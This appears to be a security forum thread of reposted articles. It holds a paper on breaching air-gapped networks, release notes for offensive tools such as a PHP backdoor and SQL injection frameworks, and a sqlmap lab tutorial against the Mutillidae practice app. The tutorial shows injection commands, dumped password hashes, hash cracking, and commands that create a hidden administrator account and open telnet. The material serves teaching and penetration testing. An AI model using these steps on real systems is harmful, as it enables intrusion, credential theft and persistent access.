Nytro

Penetrating and Achieving Persistence in Highly Secured Networks By: Bogdan Botezatu Only a couple of years ago, cyber-criminals almost exclusively targeted Internet-connected end-users and companies. Now, high profile attacks target isolated, highly secure corporate or business environments. This paper describes the challenges of breaching such systems, achieving persistence for as long as possible and payload delivery mechanisms. Ever since government and companies adopted the Internet on a massive scale, cyber-criminals have become interested in breaching these critical infrastructures and monetizing them in various ways, with particular focus on disruption and information theft. The continuous siege from outside hostile parties has prompted businesses, enterprises, governments and mission-critical service companies such as utility providers to isolate their networks and render them inaccessible (or limit their accessibility) to the outside world. As a rule, the more critical the network is, the higher the degree of isolation. How is successful penetration carried in isolated environments? One of the most frequent mistakes when deploying a highly secure network is allowing it to be extended without the intervention of a network administrator. Many times, employees trade security for usability without even realizing they are exposing the network to outside threats. Wireless access points installed without notification and without proper security, public and private network bridging through proxy servers or the installation of other devices for tethering (i.e. mobile phones or 3G modems) can and will annihilate any safety mechanism the network administrator has in place. An advanced persistent threat attack begins with either exploiting one of the technical vulnerabilities exposed above, or by social engineering the user into breaking security protocols of the organization, such as the restriction to plug in a USB drive in computers that are part of the private network. The goal of an advanced persistent threat is gaining prolonged access to an organization’s resources for monitoring or sabotage. Figure 1: Vulnerable spots of a protected network. Wireless extensions and unauthorized gateways to the Internet expose the network to outside attackers. Exploitation of an unauthorized extension of the network with wireless devices is the easiest method in which a cyber-criminal in close proximity can gain access to a protected environment. In the absence of a strong audit of the network configuration, legitimate users could add a wireless router in a spare Ethernet outlet or even bridge a wireless connection to work in access point mode. Most of the times, these are not deliberate acts of sabotage, but fatal mistakes aimed at enhancing usability of a restrictive networking environment (i.e. sharing the local internet connection with a smartphone or creating a wireless connection in the meeting room without consent from the network administrator). This way, any nearby attacker can probe the Wi-Fi space for unprotected or poorly-secured networks, then use open-source tools to attack WEP, WPA, LEAP or even VPNs and other proprietary wireless technologies[1]. Once the network has been identified, cracking the rudimentary encryption would allow the attacker to connect to the network to access resources. Mitigation: As a system administrator, you should always disable any Ethernet outlet that is not in permanent use directly from the patch panel in the server room. Configure your DHCP server to lease IPs by MAC addresses only. Talk to employees about the importance of keeping the network isolated at all times. Make them understand that any modification to the network infrastructure will have disastrous effects. Use Wi-Fi space monitoring tools to detect wireless signals originating from your facility. A simple $10 key fob Wi-Fi signal detector is often enough to identify illegal access points in your organization Unregulated access to the internet via 3G modems or 3G tethering defeats the purpose of isolating the network environment. Whenever the user connects to the internet through a personal device from a machine that is part of the isolated network, they become perfect targets for blended threats – malware delivered via well formatted e-mail messages that trick the user into either downloading an infected and apparently innocuous attachment (such as a PDF or document file) or prompt the user to visit a legitimate website hosting malware. Mitigation: Enforce security policies on all computers connected to the network. Disable or render USB ports physically inaccessible to prevent storage devices from connecting to the PC. This way, users can’t inadvertently plant malware and can’t move stolen information outside of the network. Block Bluetooth and wireless on host computers to disallow file transfers and interconnection with user-owned devices. Personal storage and multimedia devices arbitrarily plugged into network computers can act as highly effective vectors not only for malware, but also for the information that escapes the network to the attacker’s command and control server. This approach, although less effective than directly sending data to the attacker via the Internet, has proven much more successful in high-profile attacks such as the Flamer incident[2]. Last, but not least, mind the physical security of the facility. Even the most secured networking environment is useless if physical access to the facility, data center or server room is lax or unregulated. Skilled social engineers can cut their way through office buildings; determined attackers can convince or coerce personnel with access to the building (employees, janitorial team, maintenance crew) to plant devices for them and open security breaches at the network perimeter. The Darpa-funded Pwnie Express products[3] for instance are disguised as power strips and can be connected to the network, then used by attackers for persistent access to the network over 3G. Achieving persistence in isolated environments For long-term exploitation of the isolated network, attackers use a combination of malware tools that take care of deployment, data and password gathering, scanning the network perimeter and reporting. These tools keep a low profile and are specially designed to evade antivirus detection. The evasion is possible because, most of the time, the cyber-criminal team behind the attack uses brand-new code that has never been seen in the wild by antivirus vendors. Zero-day exploitation against client software plays a key role in the stealthy dissemination of the payload across the network, aided by unconventional malware programming using less known APIs and next to no obfuscation of the malicious code. A key advantage of an isolated environment is that it is considered clean and virus-free. By design, they allow no intrusion from the outside, as they are rarely connected to other networks. More than that, one of the most effective means of defense against malware is only partially functional: in the absence of a permanent connection to the internet to deliver hourly malware signature updates, the antivirus uses only outdated signatures and behavioral patterns – two technologies that are highly ineffective against brand-new malicious code engineered to conceal suspicious behavior. We know advanced malicious code used in breaching isolated networks often comes unencrypted, unpacked and needs no internet connection to operate. These features are critical in evading antivirus detection that monitors code changes, entropy and typical malicious behavior. This was the case of Flamer, the world’s largest piece of malware, which avoided detection by having the exact opposite features of modern, commercial malware. In the absence of an antivirus solution to flag the intrusion, it is up to the network administrator to mitigate a possible infection by constantly monitoring network traffic and ensuring that security policies are enforced. Figure 2: The circuit of a Flamer-infected device: the employee is used both as a vector of infection and as a carrier for stolen data Payload delivery and operation mechanism One of the most frequently-encountered misconceptions is that a piece of malware is only harmful when it can actively communicate with the command and control server. While this is mostly true for consumer-grade malware that specializes in sending spam, harvesting addresses or manipulating banking transactions, the outlook is different for military-grade e-threats the size and complexity of Stuxnet, Duqu or Flamer. Malware specializing in cyber-espionage rarely relies on the local connection to the Internet to siphon data outside of the perimeter. That approach would likely trigger firewall alerts; the huge amount of data sent to the C & C server is also likely to be visible to packet inspection applications such as Wireshark, which will compromise the operation. More likely, the attackers use an employee’s removable device as transportation between the isolated network and an unmonitored, compromised workstation at the employee’s home, for instance. Not all malware is tailored for espionage and persistence, but is rather focused on delivering a payload or fulfilling a mission. This was the case of Stuxnet, world’s first piece of malware that was tailored to subvert an industrial system to compromise the production process at the Natanz-based uranium enrichment facility in Iran. The e-threat was particularly designed to seize control the Siemens Simatic WinCC SCADA applications controlling centrifuge machines and did not affect computers or networks that did not meet specific architecture requirements. Conclusion Isolated networks are the ultimate fortresses, but they are penetrable. The ecosystem is as safe as its weakest link: the human user, be it employee, system or network administrator. The Stuxnet and Flamer incidents have demonstrated that even the most secured networks are no match for cyber-weapons, instruments designed to go where no piece of malware has gone before. These instruments, who likely share the same origin, prove that highly-skilled cyber-criminal groups can always take the game one step further and bring more and more sophisticated threats to outsmart defense mechanisms. [1] Jeremy Faircloth, Penetration Tester’s Open Source Toolkit, third edition – Elsevier, 2011 [2] Bogdan Botezatu, FLAME – The Story of Leaked Data Carried by Human Vector – FLAME – The Story of Leaked Data Carried by Human Vector | Bitdefender Labs [3] Power Pwn | Pwnie Express About The Author Bogdan Botezatu Senior E-Threat Analyst Bogdan Botezatu is living his second childhood at Bitdefender as senior e-threat analyst. When he is not documenting sophisticated strains of malware or writing removal tools, he teaches extreme sports such as surfing the web without protection or rodeo with wild Trojan horses. He believes that most things in life can be beat with strong heuristics and that antimalware research is like working for a secret agency: you need to stay focused at all times, but you get all the glory when you catch the bad guys. Sursa: Penetrating and Achieving Persistence in Highly Secured Networks | HOTforSecurity

[h=1]Weevely 1.0[/h]by Mayuresh on February 5, 2013 Our old post regarding the weevely tiny PHP backdoor can be found here. Recently, an update was released – weevely version 1.0, that brings new modules with totally refactored structure to assist remote administration tasks and penetration testing. “Weevely is an unobtrusive PHP backdoor that simulate telnet-like connection. It is an essential tool for application web attack post exploitation or web hosting account management. With a basic permission to upload PHP files, you only need to generate and upload the “server” PHP code on the target, and run locally Weevely to transmit shell commands. Backdoor communications are obfuscated into referrer of regular HTTP requests Backdoor code is hidden and compact because of functions dynamically injected and not embedded in User have modules available to automate interaction with remote system Modules implements different techniques to accomplish given tasks, aiming to bypass disabled_functions, safe_mode and other PHP” [h=2]Changes made in Weevely 1.0:[/h] Supports of Windows and MacOS hosts environments Module :net.mount, powered by HTTPfs, that mounts automagically remote filesystem to a local mountpoint Module :file.edit to edit remote files with your favourite local text editor Module :audit.systemfiles to find system files with bad permissions that could affect server security Module :audit.phpconf to audit common PHP misconfiguration SOCKS4 and SOCKS5 proxy supports Totally rewritten module base structure to simplify module deploying Modules arguments managament with argparse Tons of bug fixes [h=3]Download weevely:[/h] Weevely 1.0 – weevely-1.0.tar.gz/Weevely github Sursa: Weevely version 1.0! — PenTestIT

[h=1]TLSSLed v1.3[/h]by Mayuresh on February 6, 2013 We included TLSSLed in our list of List of SSL Scanners for Penetration Testers! A few days ago, an update was released – TLSSLed version 1.3! This version is the result of testing lots of HTTPS (SSL/TLS) implementations during real-world pen-tests, so it is full of minor improvements and extra checks to identify different behaviors we have found in the wild. Additionally, the tool output has been changed for easy reading and to provide quick information for each finding: negative [-], positive [+], or informational [.] (as well as grouping tests [*] and highlight warning and error messages [!]). “TLSSLed is a Linux shell script whose purpose is to evaluate the security of a target SSL/TLS (HTTPS) web server implementation. It is based on sslscan, a thorough SSL/TLS scanner that is based on the openssl library, and on the “openssl s_client” command line tool. The current tests include checking if the target supports the SSLv2 protocol, the NULL cipher, weak ciphers based on their key length (40 or 56 bits), the availability of strong ciphers (like AES), if the digital certificate is MD5 signed, and the current SSL/TLS renegotiation capabilities.” [h=2]This is the official change log for TLSSLed v1.3:[/h] All file output goes to a single directory (same file names as in previous versions) instead of to the working local directory. Change in the date format used for log files: From: 2011-12-30_105055 – To: 20111230-105055 Test if SSL/TLS renegotiation is enabled (NEW check) and if the target service supports secure renegotiation (already in previous versions). If secure renegotiation is not supported, we must check renegotiation by using legacy renegotiation (two new log files are used). New test to check for legacy renegotiation even when secure renegotiation is supported, just in case the target service supports both. Test if client certificate authentication is required by the target service. If so, identify the number of CAs accepted and save the list of CAs to a file. New test to check for HTTP headers using HTTP/1.0 (previous versions) as well as HTTP/1.1 and a valid Host header. New log files created for this. New error handling code for the initial SSL/TLS verification. Optimizations in the openssl delays (sleep timers). New DELAY variable to control sleep timers (by default 3 seconds it was 5 before). New output indentation. New output code set for findings: – (negative), + (positive), . (info), * (group of checks) or ! (error/warning). LOGFILE changed to SSLSCANLOGFILE & ERRFILE changed to SSLSCANERRFILE. RENEGLEGACY???FILE(s) included in the final listing and removal process. Several changes to the output messages for the different findings. Duplication of “Preferred Server Cipher” output message removed. New check to test for RC4 in the preferred cipher(s) regarding BEAST. Use of openssl “-prexit” option for some weird target scenarios (CSA). Added the date and time at the beginning of the output. This version has been tested on updated versions of Samurai WTF 2.0 (running openssl 1.0.1 and sslscan 1.8.2), Backtrack5 R3 (running openssl 0.9.8k and sslscan 1.8.2), and Mac OS X Mountain Lion 10.8.x (running openssl 0.9.8r and sslscan 1.8.2). Samurai WTF 2.0 is the only one of these three that includes openssl v1.0.x by default, providing support for the TLS v1.1 and v1.2 protocol tests. Download TLSSLed: TLSSLed v1.3 – TLSSLed_v1.3.sh Sursa: TLSSLed v1.3! — PenTestIT

[h=1]Mobius Forensic Toolkit 0.5.16[/h]by Mayuresh on February 6, 2013 Mobius Forensic Toolkit is being continuously developed and it has been recently updated! The bug fixed release is Mobius Forensic Toolkit version 0.5.16. “Mobius Forensic Toolkit is a forensic framework written in Python/GTK that manages cases and case items, providing an abstract interface for developing extensions. Cases and item categories are defined using XML files for easy integration with other tools.” [h=2]Official release notes for Mobius Forensic Toolkit 0.5.16:[/h] This release features the Turing extension, an extension to handle cryptographic services. It is fully integrated to the Hive (registry) extension, so that when registry files are opened, it automatically records the user account password hashes and tests keywords such as LSA secrets, e-mail passwords, and Internet Explorer Autocomplete, among others. All hashes and passwords found are stored in an SQLite database. The Turing extension exports and imports to/from John The Ripper .pot files and to John The Ripper hash files. [h=3]Download Mobius Forensic Toolkit:[/h] Mobius Forensic Toolkit 0.5.16 – mobiusft-0.5.16.tar.gz/mobiusft-0.5.16.tar.bz2/mobiusft/mobiusft-0.5.16.zip Sursa: Mobius Forensic Toolkit 0.5.16! — PenTestIT

[h=1]NOWASP Mutillidae 2.4.3[/h]by Mayuresh on February 6, 2013 Our first post regarding NOWASP (Codename Mutillidae) can be found here. Recently an update – NOWASP (Codename Mutillidae) version 2.4.3 – was released. This release comes a new sqlmap target page with hints & links(Menu -> SQLi -> SQLMap Targets) and lots of bug fixes. “NOWASP (Mutillidae) is a free, open source web application provided to allow security enthusiast to pen-test a web application. NOWASP (Mutillidae) can be installed on Linux,Windows XP, and Windows 7 using XAMMP making it easy for users who do not want to administrate a webserver. It is already installed on SamuraiWTF and Rapid7Metasploitable-2. The existing version can be updated on either. Containing dozens of vulns and hints to help the user; this is an easy-to-use web hacking environment deliberately designed for labs, security enthusiast, classrooms, CTF, and vulnerability assessment tool targets. Mutillidae has been used in graduate security courses, in corporate web sec training courses, and as an “assess the assessor” target for vulnerability assessment software.” [h=2]Official NOWASP (Mutillidae) change log:[/h] Added login.php page to the sqlmap targets in the menu Modified several links to open in new windows/tabs rather than taking over main screen Reduced some unneeded styles Added links for Firefox add-ons to home page Added link for sqlmap to home page Added new page with SQLMap practice targets, link to video, and new hints section [h=3]Download NOWASP (Mutillidae)[/h] NOWASP Mutillidae 2.4.3 – LATEST-mutillidae-2.4.3.zip Sursa: NOWASP Mutillidae 2.4.3! — PenTestIT

[h=1]SQLNinja 0.2.999-alpha1[/h]by Mayuresh on February 6, 2013 We finally have a SQLNinja update! We first covered the awesome tool here! We now have SQLNinja version 0.2.999-alpha1! This is the first alpha of the new release, with all the newest cool stuff like data extraction via WAITFOR and DNS tunnel, plus vbscript-based upload! Sqlninja is an exploitation tool to be used against web apps based on MS SQL Server that are vulnerable to SQL Injection attacks, in order to get a shell also in very hostile conditions. Sqlninja is a tool targeted to exploit SQL Injection vulnerabilities on a web application that uses Microsoft SQL Server as its back-end. Its main goal is to provide a remote access on the vulnerable DB server, even in a very hostile environment. It should be used by penetration testers to help and automate the process of taking over a DB Server when a SQL Injection vulnerability has been discovered.” [h=2]Change log for SQLNinja 0.2.999-alpha1:[/h] Added data extraction module Added vbscript-based upload Split big ugly script into modules Lots of refactoring [h=3]Download SQLNinja 0.2.999-alpha1:[/h] SQLNinja 0.2.999-alpha1 – sqlninja-0.2.999-alpha1.tgz 0.2.999-alpha1 Sursa: SQLNinja version 0.2.999-alpha1! — PenTestIT

[h=1]WAppEx 2.0![/h]by Mayuresh on February 6, 2013 Our first post about WAppEx can be found here. Recently, an update – WAppEx 2.0 was made available! This release is a huge leap from the previous one (version 1.0) and as such has been given a major version increment. It is nothing short of a total remake of the whole software! In favour of greater extensibility and flexibility WAppEx 2.0 has all the exploitation logic moved to a core exploit database. The full-fledged exploit database not only provides the good old exploits with a lot of new features, but also stands for sharing, updating, extending and more. The database is rich with new payloads, and major improvements have been made to the existing payloads and exploits. Now you can unleash massive security tests by executing a batch test of multiple exploits against multiple targets; all in one single action. The Test-on-Targets feature automates much of the tasks you would have to do manually in the previous version. Still in addition to all this, a shining toolbox of new tools has been added to the suite. Some of the new tools added are Manual Request, Dork Finder, Exploit Editor, Hidden File Checker, and Neighbor Site Finder! “WAppEx is an integrated Web Application security assessment and exploitation platform designed with the whole spectrum of security professionals to web application hobbyists in mind. It suggests a security assessment model which revolves around an extensible exploit database. Further, it complements the power with various tools required to perform all stages of a web application attack.” [h=2]Changes made to WAppEx 2.0:[/h] Auto-detect feature deleted from exploits Browser tool deleted Exploits and payloads view changed Exploit Database with the following features added: New script syntax and structure Searching, selecting, and executing of exploits. Add/remove database entries (exploits or payloads) Add exploits or payloads to the database using either the Exploit Wizard or the script file Batch testing of multiple targets against multiple exploits Execute multiple instances of one or more payloads (for every running exploit) simultaneously. Following tools added: Manual Request Dork Finder Exploit Editor Hidden File Checker Neighbor Site Finder [*]Local File Inclusion analyzer script updated [*]24 new payloads for LFI, RFI, and PHP Code Execution vulnerabilities added: Directory Explorer CodeExec Bind 3 connect-back shells Code Execution MySQL Dump ServerInfo 4 command execution payloads [*]Bug-fixes: Find Login Page crashed on start Problem with software registration Stop button did not work when retrieving data from SQL server Problem with saving SQL results Crashed when closing Find Login Page Status icons were not displayed properly in exploit tabs [h=3]Download WAppEx:[/h] WAppEX 2.0 – WAppEx2.0.exe Sursa: WAppEx version 2.0! — PenTestIT

[h=1]Sleuth Kit 4.0.2![/h]by Mayuresh on February 6, 2013 Two days ago, The Sleuth Kit was updated! We now have The Sleuth Kit version 4.0.2. Our first post about The Sleuth Kit or TSK can be found here. This release has bug fixes and some new minor features. “The Sleuth Kit (TSK) is a library and collection of command line tools that allow you to investigate volume and file system data. It is a collection of open source file system forensics tools that allow one to view allocated and deleted data from NTFS, FAT, FFS, and EXT2FS images. The Autopsy Forensic Browser provides a graphical interface to The Sleuth Kit. The Sleuth Kit is an open source forensic toolkit for analyzing Microsoft and UNIX file systems and disks. The Sleuth Kit enables investigators to identify and recover evidence from images acquired during incident response or from live systems. The Sleuth Kit is open source, which allows investigators to verify the actions of the tool or customize it to specific needs.“ [h=2]Official change log for The Sleuth Kit:[/h] New Features in Core: fiwalk is now included. Bug Fixes in Core: Fixed fcat to work on NTFS files (still doesn’t support ADS though). Fixed HFS+ support in tsk_loaddb / SQLite — root directory was not added. NTFS code now looks at all MFT entries when listing directory contents. It used to only look at unallocated entries for orphan files. This fixes an image that had allocated files missing from the directory b-tree. NTFS code uses sequence number when searching MFT entries for all files. Libewf detection code change to support v2 API more reliably (ID: 3596212). NTFS $SII code could crash in rare cases if $SDS was multiple of block size. Framework: Added new API to TskImgDB that returns the base name of an image. Numerous performance improvements to framework. Removed requirement in framework to specify module extension in pipeline configuration file. Added blackboard artifacts to represent both operating system and network service user accounts. Java Bindings: More methods to query files Methods to get current directory when being added to DB. Modified class structure a bit More lazy loading for children / parents. Better exception throwing from C++ [h=3]Download The Sleuth Kit:[/h] The Sleuth Kit 4.0.2 – sleuthkit-win32-4.0.2.zip/sleuthkit-framework-win32-4.0.2.zip/sleuthkit-4.0.2.tar.gz Sursa: The Sleuth Kit 4.0.2! — PenTestIT

+ Java SE Proof Of Concept Code ? Packet Storm

[h=1]Video Tutorial: Basics of using sqlmap automated sql injection audit tool[/h]Posted by webpwnized in Information Security on Feb 6, 2013 6:01:03 AM Author: Jeremy Druin Twitter: @webpwnized YouTube Channel: webpwnized's channel - YouTube Software required: Backtrack 5 R3 with sqlmap, Mutillidae Web Pen Test Training Environment (hxxp://sourceforge.net/projects/mutillidae/files/mutillidae-project/) ecorded at the ISSA Kentuckiana February 2013 Workshop, this video review the use of sqlmap; an automated sql injection audit tool. The video walks through using sqlmap to locate an sql injection, determine the backend database type, enumerate the database account, databases, schema, tables, columns and password hashes, then use the database to compromise the windows host. Dumping data, arguably the primary use of sqlmap, is covered only briefly since there is large amounts of documentation on this feature already. Environment The environment is a Backtrack 5 R3 "attacker" at IP 192.168.56.101 and a Windows XP "victim" at 192.168.56.102 running as virtual machines on Oracle VirtualBox. The Windows XP host is running XAMPP on which Mutillidae is installed. Mutillidae may also be installed on WAMPP or LAMP stacks including being able to be installed on Linux. Using two hosts is not neccesary to recreate the lab exercise. All of the items can be reproduced on "localhost". The database was created by installing XAMPP, unzipping the Mutillidae files into the C:\xampp\htdocs\ directory, then clicking the "Set up database" button in Mutillidae. Mutillidae has a deliberately vulnerable login page against which the sql injection was carried out. Notes from Presentation Please find notes from the talk below which can be used to follow along with the video. -------------------------------------------------- Running SQLMAP Help -------------------------------------------------- --help Help -hh Double the help -------------------------------------------------- Running SQLMAP "Manually" -------------------------------------------------- ./sqlmap.py --url="http://192.168.56.102/mutillidae/index.php?page=login.php" --data="username=asdf&password=asdf&login-php-submit-button=Login" --banner -------------------------------------------------- Capturing Request To Pass To SQLMAP -------------------------------------------------- URL: http://192.168.56.102/mutillidae/index.php?page=login.php Request: POST /mutillidae/index.php?page=login.php HTTP/1.1 Host: 192.168.56.102 User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64; rv:17.0) Gecko/20100101 Firefox/17.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive Referer: http://192.168.56.102/mutillidae/index.php?page=login.php Cookie: showhints=0; PHPSESSID=fik978dbhcujcgdjfc2lg249r4 Content-Type: application/x-www-form-urlencoded Content-Length: 57 username=asdf&password=asdf&login-php-submit-button=Login -------------------------------------------------- Running SQLMAP with "auto-parse" -------------------------------------------------- ./sqlmap.py -r ~/engagements/sqlmap/login.php.request <options> -------------------------------------------------- Running SQLMAP with various features -------------------------------------------------- ./sqlmap.py -r ~/engagements/sqlmap/login.php.request <options> --banner web server operating system: Windows web application technology: PHP 5.4.4, Apache 2.4.2 back-end DBMS: MySQL 5.0 banner: '5.5.25a' --fingerprint web server operating system: Windows web application technology: PHP 5.4.4, Apache 2.4.2 back-end DBMS: active fingerprint: MySQL >= 5.5.0 --current-user Retrieve DBMS current user --current-db Retrieve DBMS current database --hostname Retrieve DBMS server hostname --is-dba Detect if the DBMS current user is DBA current user: 'root@localhost' current database: 'nowasp' current user is DBA: True hostname: 'mutillid-7se1xr' --users Enumerate DBMS users --passwords Enumerate DBMS users password hashes database management system users [*] ''@'localhost' [*] 'pma'@'localhost' [*] 'root'@'linux' [*] 'root'@'localhost' --dbs Enumerate DBMS databases available databases[10]: [*] cdcol [*] information_schema [*] mysql [*] nowasp [*] owasp10 [*] owasp13 [*] performance_schema [*] phpmyadmin [*] test [*] webauth -------------------------------------------------------------------------------- -------------------- Enumerate DBMS database tables, columns, structure (schema) -------------------------------------------------------------------------------- -------------------- --tables Enumerate DBMS database tables --columns Enumerate DBMS database table columns --schema Enumerate DBMS schema --count Retrieve number of entries for table(s) --exclude-sysdbs Exclude DBMS system databases when enumerating tables -D DB DBMS database to enumerate -T TBL DBMS database table to enumerate -C COL DBMS database table column to enumerate -U USER DBMS user to enumerate -------------------------------------------------- Extracting data -------------------------------------------------- --dump Dump DBMS database table entries --dump-all Dump all DBMS databases tables entries -D DB DBMS database to enumerate -T TBL DBMS database table to enumerate -C COL DBMS database table column to enumerate -U USER DBMS user to enumerate --exclude-sysdbs Exclude DBMS system databases when enumerating tables --start=LIMITSTART First query output entry to retrieve --stop=LIMITSTOP Last query output entry to retrieve --sql-query=QUERY SQL statement to be executed --sql-shell Prompt for an interactive SQL shell -------------------------------------------------- Listing columns from tables -------------------------------------------------- ./sqlmap.py -r ~/engagements/sqlmap/login.php.request -D mysql -T user --columns ./sqlmap.py -r ~/engagements/sqlmap/login.php.request -D mysql -T user --common-columns ./sqlmap.py -r ~/engagements/sqlmap/login.php.request -D mysql --sql-query="select column_name from information_schema.columns where table_name = 'user'" select column_name from information_schema.columns where table_name = 'user' [42]: [*] Alter_priv [*] Alter_routine_priv [*] authentication_string [*] Create_priv [*] Create_routine_priv [*] Create_tablespace_priv [*] Create_tmp_table_priv [*] Create_user_priv [*] Create_view_priv [*] Delete_priv [*] Drop_priv [*] Event_priv [*] Execute_priv [*] File_priv [*] Grant_priv [*] Host [*] Index_priv [*] Insert_priv [*] Lock_tables_priv [*] max_connections [*] max_questions [*] max_updates [*] max_user_connections [*] Password [*] plugin [*] Process_priv [*] References_priv [*] Reload_priv [*] Repl_client_priv [*] Repl_slave_priv [*] Select_priv [*] Show_db_priv [*] Show_view_priv [*] Shutdown_priv [*] ssl_cipher [*] ssl_type [*] Super_priv [*] Trigger_priv [*] Update_priv [*] User [*] x509_issuer [*] x509_subject -------------------------------------------------- Advanced: Modifying injections -------------------------------------------------- SELECT * FROM accounts WHERE username='' AND password=''' ./sqlmap.py -r ~/engagements/sqlmap/login.php.request --prefix="SELECT * FROM accounts WHERE username='" --suffix="'-- " --banner --prefix=PREFIX Injection payload prefix string --suffix=SUFFIX Injection payload suffix string -------------------------------------------------- Advanced: Dealing with inconsistent results -------------------------------------------------- select User, Password from mysql.user versus ./sqlmap.py -r ~/engagements/sqlmap/login.php.request -D mysql --sql-query="select User, Password from mysql.user order by User desc" select User, Password from mysql.user order by User desc select User, Password, Host, authentication_string from mysql.user order by User desc [9]: [*] root, , localhost, [*] root, , linux, [*] pma, , localhost, [*] Simba, *F43B942A34347297C3B0455DAB190AFB9BBF13B5, localhost, [*] Rocky, *2BA8DF85753BE61F6C72A8784B11E68A41878032, localhost, [*] Patches, *2027D9391E714343187E07ACB41AE8925F30737E, localhost, [*] Happy, *160E7D8EE3A97BED0F0AD1563BFB619178D15D7B, localhost, [*] , , localhost, [*] , , linux, -------------------------------------------------- Cracking MySQL Password Hashes -------------------------------------------------- John the Ripper Command Line /pentest/passwords/john/john --format=mysql-sha1 /tmp/mysql.hashes Password Hashes in MySQL Format Simba:*F43B942A34347297C3B0455DAB190AFB9BBF13B5 Rocky:*2BA8DF85753BE61F6C72A8784B11E68A41878032 Patches:*2027D9391E714343187E07ACB41AE8925F30737E Happy:*160E7D8EE3A97BED0F0AD1563BFB619178D15D7B -------------------------------------------------- Understanding sqlmap O/S Shell -------------------------------------------------- View transaction: tcpdump -i eth1 -vvv -X 1st Stage Uploader 2nd Stage Command Shell Page sc query state= all sc query tlntsvr sc config tlntsvr start= demand sc start tlntsvr net user root toor /add net localgroup TelnetClients /add net localgroup Administrators root /add net localgroup TelnetClients root /add netsh firewall add portopening protocol=TCP port=23 name=telnet mode=enable scope=custom addresses=192.168.56.101 -------------------------------------------------- Interacting Directly with sqlmap O/S Shell Backdoor -------------------------------------------------- http://192.168.56.102/<temp file name>?cmd=ping%20192.168.56.101 -------------------------------------------------- Direct connection to the database -------------------------------------------------- Installing Py-MySQL Dependency git clone https://github.com/petehunt/PyMySQL/ cd PyMySQL python setup.py install cd .. rm -rf PyMySQL ./sqlmap.py -d mysql://root:""@192.168.56.102:5123/OWASP10 Sursa: https://community.rapid7.com/community/infosec/blog/2013/02/06/video-tutorial-basics-of-using-sqlmap-automated-sql-injection-audit-tool

Linux.conf.au 2013 Videos We've released these videos as quickly as possible so that people can enjoy the many great talks at LCA this year, and so we can get our rendering gear out of the venue. We know some of these may have problems, but most of them are working and tested. Please let us know if there's anything that is mistitled, short or otherwise incorrect and we'll deal with it as soon as possible. Helpful debugging information: if the closing screen (the balloons over old Parliament House) doesn't show at the end of the talk, then the file was partly rendered but the render machine probably locked up. If the closing screen shows but the talk was incomplete, then some parts of the talk may be missing, or we might simply have mistakenly unselected one of the raw video files. The former case is easily recoverable; the latter may be impossible to fix without a time machine but may also be recoverable. Let us know either way Things we can't fix: Sir Tim Berners-Lee's keynote on Friday and DSD and Open Source on Wednesday. We don't have permission to record the video for those talks. Sorry, if you weren't there, you've missed it Videos we know have problems: Bdale Garbee's Keynote on Monday - missing. Unfortunately our video capture system failed on us and we captured this on four DV tapes. I've got the 32GB of video of this on a hard disk, and I've cut together a full video in PiTiVi but it seems to refuse to render it. I will be trying Cinelerra to see if that works, or if restarting my PiTiVi project from scratch fixes it. This is a long job and will have to wait for the moment - Paul, 5/2/13. Miniconf videos. These were captured and are on file but the schedule in the video processing system is out of date. I'm going to try importing the latest schedule and seeing if that fixes it without also breaking every other talk. If not, I'll recreate the schedule by hand - Paul, 5/2/13. Ain't No Party Like A Unix Party - mislabeled talk (thanks Tim Suess). Daniel Black notes that this might be mislabeled as 'Touch And Go - Modern User Interfaces Using Open Source. This is probably a schedule mismatch and hopefully an easy fix - Paul, 5/2/13. Why Kernel space sucks - audio drops at end (thanks Neil Brown). This is probably unrecoverable but I'll review it - Paul, 5/2/13. Bufferbloat from a Plumber's point of viewi (mp4) - only the end of the talk (thanks Dave Taht and Andrew McDonnell). This may be a missing or incorrectly skipped DV file - will review - Paul, 5/2/13. The future of nonvolatile memory (ogv) - truncated (thanks Neil Brown). Probably one of the render nodes locked up during rendering - will re-render - Paul, 5/2/13. High Speed Data Acquisition - missing (thanks Andrew McDonnell). I know we have this talk, I'm just not sure why it hasn't been rendered - will fix - Paul, 5/2/13. Copyright's Dark Clouds - Optus v NRL (ogv), Free and Open Source Software and Activism (ogv), Openstack on Openstack - a single management API for all your servers (ogv and mp4), and Using open source in over 1100 schools in New Zealand (ogv) - all truncated (thanks Ambrose Andrews, Robert Collins and Daniel Bryant). These are definitely rendering errors and we'll rebuild them - Paul, 5/2/13. The IPocalypse 20 months later (mp4) and RealTime Response on Multicore Systems - It is bigger than I thought (mp4) - both shorter than expected (thanks Ashley Hull). Probably render node failure, will reprocess - Paul, 5/2/13. Linux Gaming At Last - Tuning Open Source Graphics Drivers for Valve Software (ogv) - seems to skip at about 0:12:39 and resolve the problem soon after (thanks Phil Ingram). This may have been a rendering issue, will reprocess to try and fix it - Paul, 6/2/13. Thanks to everyone who's reported problems - it's not a perfect system, but check back here after Wednesday 6th February for updates. The overall response to getting the videos up quickly rather than perfectly has been very positive - thanks for your support! Paul Wayper, AV Wrangler [TABLE] [TR] [TD][/TD] [TD]Parent Directory[/TD] [TD] [/TD] [TD=align: right] - [/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]3D_Printing_with_Repsnapper.mp4[/TD] [TD=align: right]02-Feb-2013 18:00 [/TD] [TD=align: right] 88M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]15MW_and_3600_penguins_in_a_room_Supercomputing_at_ANU.mp4[/TD] [TD=align: right]03-Feb-2013 17:42 [/TD] [TD=align: right] 91M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]A_New_Linux_Platform_Hardware_and_Software.mp4[/TD] [TD=align: right]03-Feb-2013 16:55 [/TD] [TD=align: right] 81M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]After_Arduino.mp4[/TD] [TD=align: right]04-Feb-2013 10:13 [/TD] [TD=align: right] 66M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]An_Introduction_to_Linux_IPC_Facilities.mp4[/TD] [TD=align: right]03-Feb-2013 12:21 [/TD] [TD=align: right]260M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]ArduSat_Open_Source_in_orbit.mp4[/TD] [TD=align: right]02-Feb-2013 19:21 [/TD] [TD=align: right] 86M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Beyond_Alt_Text_What_Every_Project_Should_Know_About_Accessibility.mp4[/TD] [TD=align: 